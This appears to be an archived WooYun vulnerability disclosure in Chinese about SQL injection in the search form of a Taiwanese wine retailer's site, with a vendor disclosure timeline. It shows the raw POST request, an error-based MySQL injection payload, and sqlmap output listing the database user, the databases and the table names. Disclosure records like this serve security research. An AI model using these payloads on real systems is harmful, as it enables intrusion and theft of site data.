乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-29: 细节已通知厂商并且等待厂商处理中 2015-12-31: 厂商已经确认,细节仅向厂商公开 2016-01-10: 细节向核心白帽子及相关领域专家公开 2016-01-20: 细节向普通白帽子公开 2016-01-30: 细节向实习白帽子公开 2016-02-12: 细节向公众公开
夏朵成立於1999年12月,至今已有14.5歲了,「夏朵」一個聽起來很女性也很法國的名字,沒錯!夏朵是由法文”Chateaux”(酒堡)直譯而來。一開始是由三位愛好葡萄酒文化的資深女業務所共同組成的,現在大部分的員工都是股東,業務員全是女性而且在葡萄酒界皆有15年以上的經驗。我們以銷售法國級數酒著稱,我們很驕傲地說:在頂級酒這塊市場上「夏朵」佔有一席很重要之地位,這要歸功於我們專業的團隊與支持我們的客戶群
站点:
http://**.**.**.**/
在搜索处存在post注入抓包:
POST /search.php HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://**.**.**.**/search.phpCookie: PHPSESSID=c73a78dc58fd5819b08078c04d627c9dConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 48keyword=1&Searchtype=1&button=%E9%80%81%E5%87%BA
数据:
Place: POSTParameter: keyword Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: keyword=1' AND (SELECT 7441 FROM(SELECT COUNT(*),CONCAT(0x3a7272633a,(SELECT (CASE WHEN (7441=7441) THEN 1 ELSE 0 END)),0x3a7471643a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'NarQ'='NarQ&Searchtype=1&button=??---[11:48:37] [INFO] the back-end DBMS is MySQLweb application technology: Nginxback-end DBMS: MySQL 5.0[11:48:37] [INFO] fetching current user[11:48:38] [INFO] retrieved: xuaetahc_web@localhostcurrent user: 'xuaetahc_web@localhost'
available databases [2]:[*] information_schema[*] xuaetahc_webdb
Database: xuaetahc_webdb[14 tables]+---------------------------------------+| pro_brand || pro_cate || pro_formula || pro_level || pro_nation || pro_product || pro_region || pro_type || pro_v2p || pro_vendor || tbadmin || tbconposter || tbcontype || tbdealers |+---------------------------------------+Database: information_schema[65 tables]+---------------------------------------+| CHARACTER_SETS || CLIENT_STATISTICS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_TEMPORARY_TABLES || GLOBAL_VARIABLES || INDEX_STATISTICS || INNODB_BUFFER_PAGE || INNODB_BUFFER_PAGE_LRU || INNODB_BUFFER_POOL_PAGES || INNODB_BUFFER_POOL_PAGES_BLOB || INNODB_BUFFER_POOL_PAGES_INDEX || INNODB_BUFFER_POOL_STATS || INNODB_CHANGED_PAGES || INNODB_CMP || INNODB_CMPMEM || INNODB_CMPMEM_RESET || INNODB_CMP_RESET || INNODB_INDEX_STATS || INNODB_LOCKS || INNODB_LOCK_WAITS || INNODB_RSEG || INNODB_SYS_COLUMNS || INNODB_SYS_FIELDS || INNODB_SYS_FOREIGN || INNODB_SYS_FOREIGN_COLS || INNODB_SYS_INDEXES || INNODB_SYS_STATS || INNODB_SYS_TABLES || INNODB_SYS_TABLESTATS || INNODB_TABLE_STATS || INNODB_TRX || INNODB_UNDO_LOGS || KEY_COLUMN_USAGE || PARAMETERS || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || QUERY_RESPONSE_TIME || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLESPACES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TABLE_STATISTICS || TEMPORARY_TABLES || THREAD_STATISTICS || TRIGGERS || USER_PRIVILEGES || USER_STATISTICS || VIEWS || XTRADB_ADMIN_COMMAND |+---------------------------------------+
危害等级:高
漏洞Rank:15
确认时间:2015-12-31 02:02
感謝通報
暂无